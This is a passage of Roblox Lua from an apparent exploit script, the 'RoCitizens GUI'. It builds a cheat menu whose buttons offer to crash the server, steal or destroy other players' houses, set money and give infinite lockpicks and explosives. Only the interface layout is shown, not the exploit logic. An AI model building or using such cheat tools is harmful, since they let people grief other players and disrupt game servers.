  629. HouseLoad.BackgroundColor3 = Color3.new(1, 1, 1)
  630. HouseLoad.Position = UDim2.new(0, 215, 0, 0)
  631. HouseLoad.Size = UDim2.new(0.25, 0, 0, 25)
  632. HouseLoad.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  633. HouseLoad.Font = Enum.Font.ArialBold
  634. HouseLoad.Text = "Load"
  635. HouseLoad.TextColor3 = Color3.new(1, 1, 1)
  636. HouseLoad.TextSize = 14
  637. HouseLoad.TextStrokeTransparency = 0
  638.  
  639. HouseName_2.Name = "HouseName"
  640. HouseName_2.Parent = Func13
  641. HouseName_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  642. HouseName_2.BorderColor3 = Color3.new(0, 0, 0)
  643. HouseName_2.Position = UDim2.new(0, 90, 0, 0)
  644. HouseName_2.Size = UDim2.new(0, 120, 0, 25)
  645. HouseName_2.ClearTextOnFocus = false
  646. HouseName_2.Font = Enum.Font.Arial
  647. HouseName_2.Text = "House 1"
  648. HouseName_2.TextColor3 = Color3.new(1, 1, 1)
  649. HouseName_2.TextSize = 17
  650. HouseName_2.TextStrokeTransparency = 0
  651.  
  652. Func14.Name = "Func14"
  653. Func14.Parent = Functions
  654. Func14.BackgroundColor3 = Color3.new(1, 1, 1)
  655. Func14.BackgroundTransparency = 1
  656. Func14.Position = UDim2.new(0, 0, 0, 390)
  657. Func14.Size = UDim2.new(1, 0, 0, 25)
  658.  
  659. Signs.Name = "Signs"
  660. Signs.Parent = Func14
  661. Signs.BackgroundColor3 = Color3.new(1, 1, 1)
  662. Signs.BackgroundTransparency = 1
  663. Signs.Position = UDim2.new(0, 3, 0, 0)
  664. Signs.Size = UDim2.new(0, 200, 0, 25)
  665. Signs.Font = Enum.Font.Bodoni
  666. Signs.Text = "Set Signs:"
  667. Signs.TextColor3 = Color3.new(0, 0, 0)
  668. Signs.TextSize = 17
  669. Signs.TextStrokeColor3 = Color3.new(1, 1, 1)
  670. Signs.TextStrokeTransparency = 0.69999998807907
  671. Signs.TextWrapped = true
  672. Signs.TextXAlignment = Enum.TextXAlignment.Left
  673.  
  674. SignsB.Name = "SignsB"
  675. SignsB.Parent = Func14
  676. SignsB.BackgroundColor3 = Color3.new(1, 1, 1)
  677. SignsB.Position = UDim2.new(0, 215, 0, 0)
  678. SignsB.Size = UDim2.new(0.25, 0, 0, 25)
  679. SignsB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  680. SignsB.Font = Enum.Font.ArialBold
  681. SignsB.Text = "Set"
  682. SignsB.TextColor3 = Color3.new(1, 1, 1)
  683. SignsB.TextSize = 14
  684. SignsB.TextStrokeTransparency = 0
  685.  
  686. SignsText.Name = "SignsText"
  687. SignsText.Parent = Func14
  688. SignsText.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  689. SignsText.BorderColor3 = Color3.new(0, 0, 0)
  690. SignsText.Position = UDim2.new(0, 90, 0, 0)
  691. SignsText.Size = UDim2.new(0, 120, 0, 25)
  692. SignsText.ClearTextOnFocus = false
  693. SignsText.Font = Enum.Font.Arial
  694. SignsText.Text = "FalconPunch was here!"
  695. SignsText.TextColor3 = Color3.new(1, 1, 1)
  696. SignsText.TextScaled = true
  697. SignsText.TextSize = 17
  698. SignsText.TextStrokeTransparency = 0
  699. SignsText.TextWrapped = true
  700.  
  701. Func15.Name = "Func15"
  702. Func15.Parent = Functions
  703. Func15.BackgroundColor3 = Color3.new(1, 1, 1)
  704. Func15.BackgroundTransparency = 1
  705. Func15.Position = UDim2.new(0, 0, 0, 420)
  706. Func15.Size = UDim2.new(1, 0, 0, 25)
  707.  
  708. Crash.Name = "Crash"
  709. Crash.Parent = Func15
  710. Crash.BackgroundColor3 = Color3.new(1, 1, 1)
  711. Crash.BackgroundTransparency = 1
  712. Crash.Position = UDim2.new(0, 3, 0, 0)
  713. Crash.Size = UDim2.new(0, 200, 0, 25)
  714. Crash.Font = Enum.Font.Bodoni
  715. Crash.Text = "Crash the Fucking Server:"
  716. Crash.TextColor3 = Color3.new(0, 0, 0)
  717. Crash.TextSize = 17
  718. Crash.TextStrokeColor3 = Color3.new(1, 1, 1)
  719. Crash.TextStrokeTransparency = 0.69999998807907
  720. Crash.TextWrapped = true
  721. Crash.TextXAlignment = Enum.TextXAlignment.Left
  722.  
  723. CrashB.Name = "CrashB"
  724. CrashB.Parent = Func15
  725. CrashB.BackgroundColor3 = Color3.new(1, 1, 1)
  726. CrashB.Position = UDim2.new(0, 185, 0, 0)
  727. CrashB.Size = UDim2.new(0.349999994, 0, 0, 25)
  728. CrashB.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  729. CrashB.Font = Enum.Font.ArialBold
  730. CrashB.Text = "Crash"
  731. CrashB.TextColor3 = Color3.new(1, 1, 1)
  732. CrashB.TextSize = 14
  733. CrashB.TextStrokeTransparency = 0
  734.  
  735. Players.Name = "Players"
  736. Players.Parent = Main
  737. Players.Active = true
  738. Players.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  739. Players.BorderSizePixel = 0
  740. Players.Position = UDim2.new(1, 25, 0, 50)
  741. Players.Selectable = true
  742. Players.Size = UDim2.new(0, 300, 0, 90)
  743.  
  744. Title_2.Name = "Title"
  745. Title_2.Parent = Players
  746. Title_2.BackgroundColor3 = Color3.new(1, 1, 1)
  747. Title_2.BackgroundTransparency = 1
  748. Title_2.Size = UDim2.new(1, 0, 0, 30)
  749. Title_2.Font = Enum.Font.Bodoni
  750. Title_2.Text = "Current Selected Player: None"
  751. Title_2.TextColor3 = Color3.new(0, 0, 0)
  752. Title_2.TextSize = 17
  753. Title_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  754. Title_2.TextStrokeTransparency = 0.69999998807907
  755. Title_2.TextXAlignment = Enum.TextXAlignment.Left
  756.  
  757. Players_2.Name = "Players"
  758. Players_2.Parent = Players
  759. Players_2.Active = true
  760. Players_2.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  761. Players_2.BackgroundTransparency = 1
  762. Players_2.BorderSizePixel = 0
  763. Players_2.Position = UDim2.new(0, 0, 0, 30)
  764. Players_2.Selectable = true
  765. Players_2.Size = UDim2.new(1, 0, 1, -60)
  766.  
  767. AllPlayers.Name = "AllPlayers"
  768. AllPlayers.Parent = Players_2
  769. AllPlayers.BackgroundColor3 = Color3.new(1, 1, 1)
  770. AllPlayers.Size = UDim2.new(1, 0, 0, 25)
  771. AllPlayers.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  772. AllPlayers.Font = Enum.Font.ArialBold
  773. AllPlayers.Text = "Select all Players"
  774. AllPlayers.TextColor3 = Color3.new(1, 1, 1)
  775. AllPlayers.TextSize = 14
  776. AllPlayers.TextStrokeTransparency = 0
  777.  
  778. PlayerBOX.Name = "PlayerBOX"
  779. PlayerBOX.Parent = Players_2
  780. PlayerBOX.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  781. PlayerBOX.BorderColor3 = Color3.new(0, 0, 0)
  782. PlayerBOX.Position = UDim2.new(0, 5, 0, 30)
  783. PlayerBOX.Size = UDim2.new(1, -10, 0, 25)
  784. PlayerBOX.Font = Enum.Font.Arial
  785. PlayerBOX.Text = "Enter Player Name"
  786. PlayerBOX.TextColor3 = Color3.new(1, 1, 1)
  787. PlayerBOX.TextSize = 17
  788. PlayerBOX.TextStrokeTransparency = 0
  789. end)
  790. if not Succ or Obj == nil then
  791. local RoCitizens = Instance.new("ScreenGui")
  792. local Main = Instance.new("Frame")
  793. local Title = Instance.new("TextLabel")
  794. local MadeBy = Instance.new("TextLabel")
  795. local Functions = Instance.new("Frame")
  796. local Func5 = Instance.new("Frame")
  797. local DestroyLbl = Instance.new("TextLabel")
  798. local DestroyBut = Instance.new("TextButton")
  799. local Func4 = Instance.new("Frame")
  800. local TeleportLbl = Instance.new("TextLabel")
  801. local Teleport = Instance.new("TextButton")
  802. local Func3 = Instance.new("Frame")
  803. local TeleportLbl_2 = Instance.new("TextLabel")
  804. local Teleport_2 = Instance.new("TextButton")
  805. local Func2 = Instance.new("Frame")
  806. local MoneyBox = Instance.new("TextBox")
  807. local SendMoney = Instance.new("TextButton")
  808. local SetMoneyLbl = Instance.new("TextLabel")
  809. local Func1 = Instance.new("Frame")
  810. local MoneyBox_2 = Instance.new("TextBox")
  811. local SetMoney = Instance.new("TextButton")
  812. local SetMoneyLbl_2 = Instance.new("TextLabel")
  813. local Func7 = Instance.new("Frame")
  814. local PermsLbl = Instance.new("TextLabel")
  815. local Permissions = Instance.new("TextButton")
  816. local Func6 = Instance.new("Frame")
  817. local AudioChange = Instance.new("TextLabel")
  818. local Change = Instance.new("TextButton")
  819. local AudioBox = Instance.new("TextBox")
  820. local Func8 = Instance.new("Frame")
  821. local LockpickLbl = Instance.new("TextLabel")
  822. local Lockpick = Instance.new("TextButton")
  823. local Func9 = Instance.new("Frame")
  824. local ExplosivesLbl = Instance.new("TextLabel")
  825. local Explosives = Instance.new("TextButton")
  826. local Func10 = Instance.new("Frame")
  827. local Clothing = Instance.new("TextLabel")
  828. local Clothes = Instance.new("TextButton")
  829. local Func11 = Instance.new("Frame")
  830. local FurnitureLbl = Instance.new("TextLabel")
  831. local Furniture = Instance.new("TextButton")
  832. local Func12 = Instance.new("Frame")
  833. local House = Instance.new("TextLabel")
  834. local HouseSave = Instance.new("TextButton")
  835. local HouseName = Instance.new("TextBox")
  836. local Func16 = Instance.new("Frame")
  837. local Anti = Instance.new("TextLabel")
  838. local AntiD = Instance.new("TextButton")
  839. local Func13 = Instance.new("Frame")
  840. local House_2 = Instance.new("TextLabel")
  841. local HouseLoad = Instance.new("TextButton")
  842. local HouseName_2 = Instance.new("TextBox")
  843. local Func14 = Instance.new("Frame")
  844. local Signs = Instance.new("TextLabel")
  845. local SignsB = Instance.new("TextButton")
  846. local SignsText = Instance.new("TextBox")
  847. local Func15 = Instance.new("Frame")
  848. local Crash = Instance.new("TextLabel")
  849. local CrashB = Instance.new("TextButton")
  850. local Players = Instance.new("Frame")
  851. local Title_2 = Instance.new("TextLabel")
  852. local Players_2 = Instance.new("Frame")
  853. local AllPlayers = Instance.new("TextButton")
  854. local PlayerBOX = Instance.new("TextBox")
  855. --Properties:
  856. RoCitizens.Name = "RoCitizens"
  857. RoCitizens.Parent = game.Workspace.Players.LocalPlayer.PlayerGui
  858.  
  859. Main.Name = "Main"
  860. Main.Parent = RoCitizens
  861. Main.Active = true
  862. Main.BackgroundColor3 = Color3.new(0.333333, 0.666667, 1)
  863. Main.BorderSizePixel = 0
  864. Main.Draggable = true
  865. Main.Position = UDim2.new(0.100000001, 0, 0.100000001, 0)
  866. Main.Selectable = true
  867. Main.Size = UDim2.new(0, 300, 0, 550)
  868.  
  869. Title.Name = "Title"
  870. Title.Parent = Main
  871. Title.BackgroundColor3 = Color3.new(1, 1, 1)
  872. Title.BackgroundTransparency = 1
  873. Title.Size = UDim2.new(1, 0, 0, 30)
  874. Title.Font = Enum.Font.Bodoni
  875. Title.Text = "RoCitizens GUI"
  876. Title.TextColor3 = Color3.new(0, 0, 0)
  877. Title.TextSize = 20
  878. Title.TextStrokeColor3 = Color3.new(1, 1, 1)
  879. Title.TextStrokeTransparency = 0.69999998807907
  880.  
  881. MadeBy.Name = "MadeBy"
  882. MadeBy.Parent = Main
  883. MadeBy.BackgroundColor3 = Color3.new(1, 1, 1)
  884. MadeBy.BackgroundTransparency = 1
  885. MadeBy.Position = UDim2.new(0, 0, 0, 35)
  886. MadeBy.Size = UDim2.new(1, 0, 0, 30)
  887. MadeBy.Font = Enum.Font.Bodoni
  888. MadeBy.Text = "Made by: FalconPunch @v3rmillion"
  889. MadeBy.TextColor3 = Color3.new(0, 0, 0)
  890. MadeBy.TextSize = 20
  891. MadeBy.TextStrokeColor3 = Color3.new(1, 1, 1)
  892. MadeBy.TextStrokeTransparency = 0.69999998807907
  893.  
  894. Functions.Name = "Functions"
  895. Functions.Parent = Main
  896. Functions.Active = true
  897. Functions.BackgroundColor3 = Color3.new(1, 1, 1)
  898. Functions.BackgroundTransparency = 1
  899. Functions.BorderSizePixel = 0
  900. Functions.Position = UDim2.new(0, 0, 0, 70)
  901. Functions.Selectable = true
  902. Functions.Size = UDim2.new(1, 0, 1, -70)
  903.  
  904. Func5.Name = "Func5"
  905. Func5.Parent = Functions
  906. Func5.BackgroundColor3 = Color3.new(1, 1, 1)
  907. Func5.BackgroundTransparency = 1
  908. Func5.Position = UDim2.new(0, 0, 0, 120)
  909. Func5.Size = UDim2.new(1, 0, 0, 25)
  910.  
  911. DestroyLbl.Name = "DestroyLbl"
  912. DestroyLbl.Parent = Func5
  913. DestroyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  914. DestroyLbl.BackgroundTransparency = 1
  915. DestroyLbl.Position = UDim2.new(0, 3, 0, 0)
  916. DestroyLbl.Size = UDim2.new(0, 200, 0, 25)
  917. DestroyLbl.Font = Enum.Font.Bodoni
  918. DestroyLbl.Text = "Destroy Selected Player's House"
  919. DestroyLbl.TextColor3 = Color3.new(0, 0, 0)
  920. DestroyLbl.TextSize = 15
  921. DestroyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  922. DestroyLbl.TextStrokeTransparency = 0.69999998807907
  923. DestroyLbl.TextWrapped = true
  924. DestroyLbl.TextXAlignment = Enum.TextXAlignment.Left
  925.  
  926. DestroyBut.Name = "DestroyBut"
  927. DestroyBut.Parent = Func5
  928. DestroyBut.BackgroundColor3 = Color3.new(1, 1, 1)
  929. DestroyBut.Position = UDim2.new(0, 200, 0, 0)
  930. DestroyBut.Size = UDim2.new(0.300000012, 0, 0, 25)
  931. DestroyBut.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  932. DestroyBut.Font = Enum.Font.ArialBold
  933. DestroyBut.Text = "Destroy"
  934. DestroyBut.TextColor3 = Color3.new(1, 1, 1)
  935. DestroyBut.TextSize = 14
  936. DestroyBut.TextStrokeTransparency = 0
  937.  
  938. Func4.Name = "Func4"
  939. Func4.Parent = Functions
  940. Func4.BackgroundColor3 = Color3.new(1, 1, 1)
  941. Func4.BackgroundTransparency = 1
  942. Func4.Position = UDim2.new(0, 0, 0, 90)
  943. Func4.Size = UDim2.new(1, 0, 0, 25)
  944.  
  945. TeleportLbl.Name = "TeleportLbl"
  946. TeleportLbl.Parent = Func4
  947. TeleportLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  948. TeleportLbl.BackgroundTransparency = 1
  949. TeleportLbl.Position = UDim2.new(0, 3, 0, 0)
  950. TeleportLbl.Size = UDim2.new(0, 200, 0, 25)
  951. TeleportLbl.Font = Enum.Font.Bodoni
  952. TeleportLbl.Text = "Steal Selected Player's House"
  953. TeleportLbl.TextColor3 = Color3.new(0, 0, 0)
  954. TeleportLbl.TextSize = 17
  955. TeleportLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  956. TeleportLbl.TextStrokeTransparency = 0.69999998807907
  957. TeleportLbl.TextWrapped = true
  958. TeleportLbl.TextXAlignment = Enum.TextXAlignment.Left
  959.  
  960. Teleport.Name = "Teleport"
  961. Teleport.Parent = Func4
  962. Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
  963. Teleport.Position = UDim2.new(0, 200, 0, 0)
  964. Teleport.Size = UDim2.new(0.300000012, 0, 0, 25)
  965. Teleport.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  966. Teleport.Font = Enum.Font.ArialBold
  967. Teleport.Text = "Steal"
  968. Teleport.TextColor3 = Color3.new(1, 1, 1)
  969. Teleport.TextSize = 14
  970. Teleport.TextStrokeTransparency = 0
  971.  
  972. Func3.Name = "Func3"
  973. Func3.Parent = Functions
  974. Func3.BackgroundColor3 = Color3.new(1, 1, 1)
  975. Func3.BackgroundTransparency = 1
  976. Func3.Position = UDim2.new(0, 0, 0, 60)
  977. Func3.Size = UDim2.new(1, 0, 0, 25)
  978.  
  979. TeleportLbl_2.Name = "TeleportLbl"
  980. TeleportLbl_2.Parent = Func3
  981. TeleportLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
  982. TeleportLbl_2.BackgroundTransparency = 1
  983. TeleportLbl_2.Position = UDim2.new(0, 3, 0, 0)
  984. TeleportLbl_2.Size = UDim2.new(0, 200, 0, 25)
  985. TeleportLbl_2.Font = Enum.Font.Bodoni
  986. TeleportLbl_2.Text = "Teleport to Selected Player"
  987. TeleportLbl_2.TextColor3 = Color3.new(0, 0, 0)
  988. TeleportLbl_2.TextSize = 17
  989. TeleportLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  990. TeleportLbl_2.TextStrokeTransparency = 0.69999998807907
  991. TeleportLbl_2.TextWrapped = true
  992. TeleportLbl_2.TextXAlignment = Enum.TextXAlignment.Left
  993.  
  994. Teleport_2.Name = "Teleport"
  995. Teleport_2.Parent = Func3
  996. Teleport_2.BackgroundColor3 = Color3.new(1, 1, 1)
  997. Teleport_2.Position = UDim2.new(0, 185, 0, 0)
  998. Teleport_2.Size = UDim2.new(0.349999994, 0, 0, 25)
  999. Teleport_2.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1000. Teleport_2.Font = Enum.Font.ArialBold
  1001. Teleport_2.Text = "Teleport"
  1002. Teleport_2.TextColor3 = Color3.new(1, 1, 1)
  1003. Teleport_2.TextSize = 14
  1004. Teleport_2.TextStrokeTransparency = 0
  1005.  
  1006. Func2.Name = "Func2"
  1007. Func2.Parent = Functions
  1008. Func2.BackgroundColor3 = Color3.new(1, 1, 1)
  1009. Func2.BackgroundTransparency = 1
  1010. Func2.Position = UDim2.new(0, 0, 0, 30)
  1011. Func2.Size = UDim2.new(1, 0, 0, 25)
  1012.  
  1013. MoneyBox.Name = "MoneyBox"
  1014. MoneyBox.Parent = Func2
  1015. MoneyBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1016. MoneyBox.BorderColor3 = Color3.new(0, 0, 0)
  1017. MoneyBox.Position = UDim2.new(0, 95, 0, 0)
  1018. MoneyBox.Size = UDim2.new(0, 125, 0, 25)
  1019. MoneyBox.Font = Enum.Font.Arial
  1020. MoneyBox.Text = "$2,147,483,647"
  1021. MoneyBox.TextColor3 = Color3.new(1, 1, 1)
  1022. MoneyBox.TextSize = 17
  1023. MoneyBox.TextStrokeTransparency = 0
  1024.  
  1025. SendMoney.Name = "SendMoney"
  1026. SendMoney.Parent = Func2
  1027. SendMoney.BackgroundColor3 = Color3.new(1, 1, 1)
  1028. SendMoney.Position = UDim2.new(0, 225, 0, 0)
  1029. SendMoney.Size = UDim2.new(0, 73, 0, 25)
  1030. SendMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1031. SendMoney.Font = Enum.Font.ArialBold
  1032. SendMoney.Text = "Send"
  1033. SendMoney.TextColor3 = Color3.new(1, 1, 1)
  1034. SendMoney.TextSize = 14
  1035. SendMoney.TextStrokeTransparency = 0
  1036.  
  1037. SetMoneyLbl.Name = "SetMoneyLbl"
  1038. SetMoneyLbl.Parent = Func2
  1039. SetMoneyLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  1040. SetMoneyLbl.BackgroundTransparency = 1
  1041. SetMoneyLbl.Position = UDim2.new(0, 3, 0, 0)
  1042. SetMoneyLbl.Size = UDim2.new(0, 200, 0, 25)
  1043. SetMoneyLbl.Font = Enum.Font.Bodoni
  1044. SetMoneyLbl.Text = "Send Money:"
  1045. SetMoneyLbl.TextColor3 = Color3.new(0, 0, 0)
  1046. SetMoneyLbl.TextSize = 17
  1047. SetMoneyLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  1048. SetMoneyLbl.TextStrokeTransparency = 0.69999998807907
  1049. SetMoneyLbl.TextWrapped = true
  1050. SetMoneyLbl.TextXAlignment = Enum.TextXAlignment.Left
  1051.  
  1052. Func1.Name = "Func1"
  1053. Func1.Parent = Functions
  1054. Func1.BackgroundColor3 = Color3.new(1, 1, 1)
  1055. Func1.BackgroundTransparency = 1
  1056. Func1.Size = UDim2.new(1, 0, 0, 25)
  1057.  
  1058. MoneyBox_2.Name = "MoneyBox"
  1059. MoneyBox_2.Parent = Func1
  1060. MoneyBox_2.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1061. MoneyBox_2.BorderColor3 = Color3.new(0, 0, 0)
  1062. MoneyBox_2.Position = UDim2.new(0, 85, 0, 0)
  1063. MoneyBox_2.Size = UDim2.new(0, 125, 0, 25)
  1064. MoneyBox_2.Font = Enum.Font.Arial
  1065. MoneyBox_2.Text = "$2,147,483,647"
  1066. MoneyBox_2.TextColor3 = Color3.new(1, 1, 1)
  1067. MoneyBox_2.TextSize = 17
  1068. MoneyBox_2.TextStrokeTransparency = 0
  1069.  
  1070. SetMoney.Name = "SetMoney"
  1071. SetMoney.Parent = Func1
  1072. SetMoney.BackgroundColor3 = Color3.new(1, 1, 1)
  1073. SetMoney.Position = UDim2.new(0, 215, 0, 0)
  1074. SetMoney.Size = UDim2.new(0, 75, 0, 25)
  1075. SetMoney.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1076. SetMoney.Font = Enum.Font.ArialBold
  1077. SetMoney.Text = "Set"
  1078. SetMoney.TextColor3 = Color3.new(1, 1, 1)
  1079. SetMoney.TextSize = 14
  1080. SetMoney.TextStrokeTransparency = 0
  1081.  
  1082. SetMoneyLbl_2.Name = "SetMoneyLbl"
  1083. SetMoneyLbl_2.Parent = Func1
  1084. SetMoneyLbl_2.BackgroundColor3 = Color3.new(1, 1, 1)
  1085. SetMoneyLbl_2.BackgroundTransparency = 1
  1086. SetMoneyLbl_2.Position = UDim2.new(0, 3, 0, 0)
  1087. SetMoneyLbl_2.Size = UDim2.new(0, 200, 0, 25)
  1088. SetMoneyLbl_2.Font = Enum.Font.Bodoni
  1089. SetMoneyLbl_2.Text = "Set Money:"
  1090. SetMoneyLbl_2.TextColor3 = Color3.new(0, 0, 0)
  1091. SetMoneyLbl_2.TextSize = 17
  1092. SetMoneyLbl_2.TextStrokeColor3 = Color3.new(1, 1, 1)
  1093. SetMoneyLbl_2.TextStrokeTransparency = 0.69999998807907
  1094. SetMoneyLbl_2.TextWrapped = true
  1095. SetMoneyLbl_2.TextXAlignment = Enum.TextXAlignment.Left
  1096.  
  1097. Func7.Name = "Func7"
  1098. Func7.Parent = Functions
  1099. Func7.BackgroundColor3 = Color3.new(1, 1, 1)
  1100. Func7.BackgroundTransparency = 1
  1101. Func7.Position = UDim2.new(0, 0, 0, 180)
  1102. Func7.Size = UDim2.new(1, 0, 0, 25)
  1103.  
  1104. PermsLbl.Name = "PermsLbl"
  1105. PermsLbl.Parent = Func7
  1106. PermsLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  1107. PermsLbl.BackgroundTransparency = 1
  1108. PermsLbl.Position = UDim2.new(0, 3, 0, 0)
  1109. PermsLbl.Size = UDim2.new(0, 200, 0, 25)
  1110. PermsLbl.Font = Enum.Font.Bodoni
  1111. PermsLbl.Text = "House Permissions"
  1112. PermsLbl.TextColor3 = Color3.new(0, 0, 0)
  1113. PermsLbl.TextSize = 17
  1114. PermsLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  1115. PermsLbl.TextStrokeTransparency = 0.69999998807907
  1116. PermsLbl.TextWrapped = true
  1117. PermsLbl.TextXAlignment = Enum.TextXAlignment.Left
  1118.  
  1119. Permissions.Name = "Permissions"
  1120. Permissions.Parent = Func7
  1121. Permissions.BackgroundColor3 = Color3.new(1, 1, 1)
  1122. Permissions.Position = UDim2.new(0, 135, 0, 0)
  1123. Permissions.Size = UDim2.new(0.519999981, 0, 0, 25)
  1124. Permissions.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1125. Permissions.Font = Enum.Font.ArialBold
  1126. Permissions.Text = "OFF"
  1127. Permissions.TextColor3 = Color3.new(1, 0, 0)
  1128. Permissions.TextSize = 14
  1129. Permissions.TextStrokeTransparency = 0.5
  1130.  
  1131. Func6.Name = "Func6"
  1132. Func6.Parent = Functions
  1133. Func6.BackgroundColor3 = Color3.new(1, 1, 1)
  1134. Func6.BackgroundTransparency = 1
  1135. Func6.Position = UDim2.new(0, 0, 0, 150)
  1136. Func6.Size = UDim2.new(1, 0, 0, 25)
  1137.  
  1138. AudioChange.Name = "AudioChange"
  1139. AudioChange.Parent = Func6
  1140. AudioChange.BackgroundColor3 = Color3.new(1, 1, 1)
  1141. AudioChange.BackgroundTransparency = 1
  1142. AudioChange.Position = UDim2.new(0, 3, 0, 0)
  1143. AudioChange.Size = UDim2.new(0, 200, 0, 25)
  1144. AudioChange.Font = Enum.Font.Bodoni
  1145. AudioChange.Text = "Change All Audio"
  1146. AudioChange.TextColor3 = Color3.new(0, 0, 0)
  1147. AudioChange.TextSize = 17
  1148. AudioChange.TextStrokeColor3 = Color3.new(1, 1, 1)
  1149. AudioChange.TextStrokeTransparency = 0.69999998807907
  1150. AudioChange.TextWrapped = true
  1151. AudioChange.TextXAlignment = Enum.TextXAlignment.Left
  1152.  
  1153. Change.Name = "Change"
  1154. Change.Parent = Func6
  1155. Change.BackgroundColor3 = Color3.new(1, 1, 1)
  1156. Change.Position = UDim2.new(0, 215, 0, 0)
  1157. Change.Size = UDim2.new(0.25, 0, 0, 25)
  1158. Change.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1159. Change.Font = Enum.Font.ArialBold
  1160. Change.Text = "Change"
  1161. Change.TextColor3 = Color3.new(1, 1, 1)
  1162. Change.TextSize = 14
  1163. Change.TextStrokeTransparency = 0
  1164.  
  1165. AudioBox.Name = "AudioBox"
  1166. AudioBox.Parent = Func6
  1167. AudioBox.BackgroundColor3 = Color3.new(0.282353, 0.584314, 0.862745)
  1168. AudioBox.BorderColor3 = Color3.new(0, 0, 0)
  1169. AudioBox.Position = UDim2.new(0, 120, 0, 0)
  1170. AudioBox.Size = UDim2.new(0, 90, 0, 25)
  1171. AudioBox.Font = Enum.Font.Arial
  1172. AudioBox.Text = "856173428"
  1173. AudioBox.TextColor3 = Color3.new(1, 1, 1)
  1174. AudioBox.TextSize = 17
  1175. AudioBox.TextStrokeTransparency = 0
  1176.  
  1177. Func8.Name = "Func8"
  1178. Func8.Parent = Functions
  1179. Func8.BackgroundColor3 = Color3.new(1, 1, 1)
  1180. Func8.BackgroundTransparency = 1
  1181. Func8.Position = UDim2.new(0, 0, 0, 210)
  1182. Func8.Size = UDim2.new(1, 0, 0, 25)
  1183.  
  1184. LockpickLbl.Name = "LockpickLbl"
  1185. LockpickLbl.Parent = Func8
  1186. LockpickLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  1187. LockpickLbl.BackgroundTransparency = 1
  1188. LockpickLbl.Position = UDim2.new(0, 3, 0, 0)
  1189. LockpickLbl.Size = UDim2.new(0, 200, 0, 25)
  1190. LockpickLbl.Font = Enum.Font.Bodoni
  1191. LockpickLbl.Text = "Infinite Lockpicks"
  1192. LockpickLbl.TextColor3 = Color3.new(0, 0, 0)
  1193. LockpickLbl.TextSize = 17
  1194. LockpickLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  1195. LockpickLbl.TextStrokeTransparency = 0.69999998807907
  1196. LockpickLbl.TextWrapped = true
  1197. LockpickLbl.TextXAlignment = Enum.TextXAlignment.Left
  1198.  
  1199. Lockpick.Name = "Lockpick"
  1200. Lockpick.Parent = Func8
  1201. Lockpick.BackgroundColor3 = Color3.new(1, 1, 1)
  1202. Lockpick.Position = UDim2.new(0, 135, 0, 0)
  1203. Lockpick.Size = UDim2.new(0.519999981, 0, 0, 25)
  1204. Lockpick.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1205. Lockpick.Font = Enum.Font.ArialBold
  1206. Lockpick.Text = "OFF"
  1207. Lockpick.TextColor3 = Color3.new(1, 0, 0)
  1208. Lockpick.TextSize = 14
  1209. Lockpick.TextStrokeTransparency = 0.5
  1210.  
  1211. Func9.Name = "Func9"
  1212. Func9.Parent = Functions
  1213. Func9.BackgroundColor3 = Color3.new(1, 1, 1)
  1214. Func9.BackgroundTransparency = 1
  1215. Func9.Position = UDim2.new(0, 0, 0, 240)
  1216. Func9.Size = UDim2.new(1, 0, 0, 25)
  1217.  
  1218. ExplosivesLbl.Name = "ExplosivesLbl"
  1219. ExplosivesLbl.Parent = Func9
  1220. ExplosivesLbl.BackgroundColor3 = Color3.new(1, 1, 1)
  1221. ExplosivesLbl.BackgroundTransparency = 1
  1222. ExplosivesLbl.Position = UDim2.new(0, 3, 0, 0)
  1223. ExplosivesLbl.Size = UDim2.new(0, 200, 0, 25)
  1224. ExplosivesLbl.Font = Enum.Font.Bodoni
  1225. ExplosivesLbl.Text = "Infinite Explosives"
  1226. ExplosivesLbl.TextColor3 = Color3.new(0, 0, 0)
  1227. ExplosivesLbl.TextSize = 17
  1228. ExplosivesLbl.TextStrokeColor3 = Color3.new(1, 1, 1)
  1229. ExplosivesLbl.TextStrokeTransparency = 0.69999998807907
  1230. ExplosivesLbl.TextWrapped = true
  1231. ExplosivesLbl.TextXAlignment = Enum.TextXAlignment.Left
  1232.  
  1233. Explosives.Name = "Explosives"
  1234. Explosives.Parent = Func9
  1235. Explosives.BackgroundColor3 = Color3.new(1, 1, 1)
  1236. Explosives.Position = UDim2.new(0, 135, 0, 0)
  1237. Explosives.Size = UDim2.new(0.519999981, 0, 0, 25)
  1238. Explosives.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
  1239. Explosives.Font = Enum.Font.ArialBold
  1240. Explosives.Text = "OFF"
  1241. Explosives.TextColor3 = Color3.new(1, 0, 0)
  1242. Explosives.TextSize = 14
  1243. Explosives.TextStrokeTransparency = 0.5
  1244.  
  1245. Func10.Name = "Func10"
  1246. Func10.Parent = Functions
